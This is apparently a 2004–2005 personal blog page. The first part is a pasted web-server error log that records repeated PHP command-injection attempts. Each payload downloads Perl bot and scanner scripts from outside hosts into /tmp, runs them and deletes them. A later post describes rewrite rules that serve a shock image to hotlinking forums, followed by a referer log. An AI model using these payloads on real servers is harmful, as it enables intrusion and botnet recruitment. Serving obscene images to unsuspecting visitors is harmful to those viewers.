[Tue Jan 4 13:45:59 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 13:46:13 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 13:46:25 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 13:46:57 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 13:47:11 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 13:47:14 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 14:33:26 2005] [error] [client 193.158.85.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 15:28:52 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 18:03:31 2005] [error] [client 212.100.254.201] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 18:56:33 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';
[Tue Jan 4 21:20:16 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 22:34:03 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Tue Jan 4 22:35:38 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 00:11:46 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 00:44:13 2005] [error] [client 217.160.207.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 01:18:34 2005] [error] [client 195.137.212.38] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 02:21:20 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 02:47:54 2005] [error] [client 212.112.232.149] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 03:05:26 2005] [error] [client 207.218.248.100] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 04:37:36 2005] [error] [client 217.160.130.70] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 05:30:56 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:53:04 2005] [error] [client 83.246.112.26] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:58:54 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:00 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:05 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:10 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:15 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:19 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:24 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:28 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:33 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:38 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:43 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:47 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 08:59:52 2005] [error] [client 202.222.18.32] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;curl -O \nwww.geocities.com/babypamo/dbase.txt;curl -O www.geocities.com/babypamo/scan.txt;perl \nscan.txt;rm scan.txt;perl dbase.txt;rm dbase.txt; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 10:03:45 2005] [error] [client 65.254.38.186] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611111;rm \nsess_189f0f0889555397a4de5485dd611111; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 10:18:53 2005] [error] [client 217.160.142.237] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 10:41:09 2005] [error] [client 81.169.171.98] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; killall -9 perl;cd /tmp;mkdir .temp22;cd .temp22;wget http://www.abcft.org/themes/bot.htm;wget http://http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;perl bot.htm;rm bot.htm; echo _END_&highlight=%27.passthru($HTTP_GET_VARS[rush]).%27';

[Wed Jan 5 11:35:54 2005] [error] [client 83.246.112.26] File does not exist: /var/www/fif3/htdocs/howto/archives/cat_code.html&rush=echo _START_; cd /tmp;wget \natlasol.com/.zk/sess_189f0f0889555397a4de5485dd611111;wget atlasol.com/.zk/sess_189f0f0889555397a4de5485dd611112;perl \nsess_189f0f0889555397a4de5485dd611112;rm sess_189f0f08895

Posted by skp at 08:59 AM
dezembro 22, 2004
don't direct link my images mmmmkay

So I've noticed somehow my pic of batboy has become popular... aparently i'm the first hit on a google image search. Funny thing is the site isn't mine, but another site cross-linking my batboy pic. Well, I'm gonna have to put an end to that... (also of note are pics of pig nuts and david hasselhoff with his shirt off)

DISCLAIMER: unless you know what goatse is DO NOT visit these links. it's nasty.
[14:01] < skp> ha check these sites (goatse avatars instead of intended batboy)
[14:01] < skp> http://tinyurl.com/4cntt
[14:01] < skp> http://tinyurl.com/5blyr
[14:01] < skp> http://tinyurl.com/6cccn
[14:01] < skp> http://tinyurl.com/6mdcc
[14:02] < skp> pwned bitches.

What I've done: added something like this to httpd.conf under each virtualhost
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http[s]?://(www\.)?fif3\.com/.*$ [NC]
RewriteRule \.(gif|jpg|jpeg|bmp)$ goatse.jpg [L]

Why I've done it:
Linking directly to an image hosted on someone else's webserver is bad. It causes excessive traffic and logs and is generally rude. So now, instead of that cute little forum avatar of batboy, now you have goatse. enjoy.

here's like a tail -1000 from my referer_log:
http://209.157.64.200/focus/f-news/1305437/posts -> /pics/people/batboy.jpg
http://70.84.74.180/~sterncha/boards/showthread.php?t=977&page=21&pp=20 -> /pics/people/batboy.jpg
http://decapolis.com/cgi-bin/ubb/ultimatebb.cgi?ubb=get_topic;f=20;t=001270;p= -> /pics/people/batboy.jpg
http://forum.frankblack.net/topic.asp?TOPIC_ID=11121𱠬 -> /pics/people/david_hasslehoff_noshirt.jpg
http://forum.frankblack.net/topic.asp?TOPIC_ID=9613&whichpage=9 -> /pics/people/david_hasslehoff_noshirt.jpg
http://forums.badassmofo.com/showthread.php?t=31130 -> /pics/people/batboy.jpg
http://forums.offtopic.com/showthread.php?t=1386881 -> /pics/people/batboy.jpg
http://forums.offtopic.com/showthread.php?t=1386881&highlight=Pokesteve -> /pics/people/batboy.jpg
http://ilx.p3r.net/thread.php?msgid=5055503 -> /pics/people/batboy.jpg
http://lm.espn.go.com/ffllm/boxscore?leagueId=58112&teamId=615405&scoringPeriodId=2451&mode=h2h&version=quick -> /pics/nuts/lawanorder.jpg
http://p077.ezboard.com/fthesooperdoopercoolchicksfrm9.showMessage?topicID=24.topic -> /pics/people/david_hasslehoff_noshirt.jpg
http://p082.ezboard.com/bxxcrossroadsxx.boardStatsUserLink?page=5&sortBy=lastPost -> /pics/people/batboy.jpg
http://p201.ezboard.com/bduelmonstersclub.boardStatsUserLink -> /pics/people/batboy.jpg
http://p205.ezboard.com/bdigitizedinvisionz.boardStatsUserLink -> /pics/people/batboy.jpg
http://p205.ezboard.com/fdigitizedinvisionzfrm13.showMessage?topicID=42.topic -> /pics/people/batboy.jpg
http://p205.ezboard.com/fdigitizedinvisionzfrm2.showMessage?topicID=62.topic -> /pics/people/batboy.jpg
http://p205.ezboard.com/fdigitizedinvisionzfrm2.showMessageRange?topicID=62.topic&start=1&stop=20 -> /pics/people/batboy.jpg
http://p219.ezboard.com/fprogamingcommunityfrm16.showMessage?topicID=14.topic -> /pics/people/batboy.jpg
http://p219.ezboard.com/fprogamingcommunityfrm8.showMessageRange?topicID=67.topic&start=61&stop=64 -> /pics/people/batboy.jpg
http://profiles.myspace.com/users/6953673 -> /pics/people/david_hasslehoff_noshirt.jpg
http://pub17.bravenet.com/forum/1459047882/show/370655 -> /pics/people/david_hasslehoff_noshirt.jpg
http://s7.invisionfree.com/Pro_Gaming_Community/index.php?showtopic=27 -> /pics/people/batboy.jpg
http://s7.invisionfree.com/Pro_Gaming_Community/index.php?showtopic=46 -> /pics/people/batboy.jpg
http://s7.invisionfree.com/Pro_Gaming_Community/index.php?showtopic=46&st=0&#entry250686 -> /pics/people/batboy.jpg
http://search.yahoo.com/search?p=%22parent+directory%22+d_boobies&ei=UTF-8&fl=0&xargs=0&pstart=1&fr=FP-tab-web-t&b=10 -> /pics/people
http://search.yahoo.com/search?p=%22parent+directory%22+d_boobies&ei=UTF-8&fl=0&xargs=0&pstart=1&fr=FP-tab-web-t&b=10 -> /pics/people/
http://tropicanopolis.blogspot.com/ -> /pics/people/batboy.jpg
http://uk.f257.mail.yahoo.com/ym/Compose?box=Inbox&Mid=2241_21152271_306516_1516_10533_0_8753_64324_1186478429&inc=&Search=&YY=28755&order=down&sort=date&pos=0&view=a&head=b -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.FreeRepublic.com/focus/f-news/1305437/posts -> /pics/people/batboy.jpg
http://www.barbelith.com/topic.php?id=15895 -> /pics/people/batboy.jpg
http://www.drinkmorepostmore.com/board/newreply.php?do=newreply&noquote=1&p=93238 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/newreply.php?do=newreply&t=9997 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93812#post93812 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93812&posted=1#post93812 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93814&posted=1#post93814 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93817&posted=1#post93817 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93818&posted=1#post93818 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93819&posted=1#post93819 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?p=93825&posted=1#post93825 -> /pics/nuts/lawanorder.jpg
http://www.drinkmorepostmore.com/board/showthread.php?t=9997 -> /pics/nuts/lawanorder.jpg
http://www.fortisenterprises.co.uk/ -> /pics/
http://www.forumsx.net/showthread.php?t=26433&page=2 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-news/1305437/posts -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-news/1305437/posts?page=137 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-news/1305437/posts?page=20 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-news/1305437/posts?page=32 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-news/1305437/posts?page=48#48 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/f-religion/1297143/posts -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/user-posts?id=91492 -> /pics/people/batboy.jpg
http://www.freerepublic.com/focus/user-posts?name=swilhelm73 -> /pics/people/batboy.jpg
http://www.johnslone.org/board/viewtopic.php?t=1164&postdays=0&postorder=asc&start=20 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.johnslone.org/board/viewtopic.php?t=1164&postdays=0&postorder=asc&start=40 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.johnslone.org/board/viewtopic.php?t=1164&start=20 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.johnslone.org/board/viewtopic.php?t=1164&start=40 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.johnslone.org/board/viewtopic.php?t=1164&start=40&postdays=0&postorder=asc&highlight= -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.livejournal.com/users/blackbeltjones/ -> /pics/people/batboy.jpg
http://www.livejournal.com/users/lillim/713931.html -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.madfam.com/forums/index.php?showtopic=209&hl= -> /pics/people/batboy.jpg
http://www.madfam.com/forums/index.php?showtopic=209&st=100 -> /pics/people/batboy.jpg
http://www.madfam.com/forums/index.php?showtopic=209&st=150 -> /pics/people/batboy.jpg
http://www.madfam.com/forums/index.php?showtopic=209&st=25 -> /pics/people/batboy.jpg
http://www.madfam.com/forums/index.php?showtopic=209&st=50 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=2555954&Mytoken=20041221202915 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=2555954&Mytoken=20041221232015 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=2555954&Mytoken=20041222045903 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=2555954&Mytoken=20041222050057 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=2555954&Mytoken=20041222144857 -> /pics/people/batboy.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221123006 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221140417 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221210747 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221212635 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221222933 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221230717 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221231355 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221232138 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221232305 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041221233821 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222010501 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222023303 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222045734 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222100328 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222100645 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222104035 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222104953 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222112921 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222121951 -> /pics/people/david_hasslehoff_noshirt.jpg
http://www.myspace.com/index.cfm?fuseaction=user.viewProfile&friendID=3476835&Mytoken=20041222122053 -> /pics/people/david_hasslehoff_noshirt.jpg
